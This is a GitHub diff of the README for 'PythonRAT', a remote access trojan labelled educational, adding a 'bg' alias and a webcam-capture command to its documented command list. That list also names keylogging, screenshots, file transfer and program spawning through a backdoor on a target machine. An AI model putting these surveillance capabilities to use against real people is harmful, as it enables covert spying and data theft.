File tree Expand file tree Collapse file tree 1 file changed +2
-1
lines changed
Expand file tree Collapse file tree 1 file changed +2
-1
lines changed Original file line number Diff line number Diff line change @@ -67,7 +67,7 @@ PythonRAT was developed for **educational** purposes and continues to be develop
6767
6868 quit --> Quit Session With The Target
6969 clear --> Clear The Screen
70- background --> Send Session With Target To Background
70+ background / bg --> Send Session With Target To Background
7171 cd *Directory name* --> Changes Directory On Target System
7272 upload *file name* --> Upload File To The Target Machine From Working Dir
7373 download *file name* --> Download File From Target Machine
@@ -76,6 +76,7 @@ PythonRAT was developed for **educational** purposes and continues to be develop
7676 keylog_dump --> Print Keystrokes That The Target From taskmanager.txt
7777 keylog_stop --> Stop And Self Destruct Keylogger File
7878 screenshot --> Takes screenshot and sends to server ./screenshots/
79+ webcam --> Takes image with webcam and sends to ./images/
7980 start *programName* --> Spawn Program Using backdoor e.g. 'start notepad'
8081 remove_backdoor --> Removes backdoor from target!!!
8182
You can’t perform that action at this time.
0 commit comments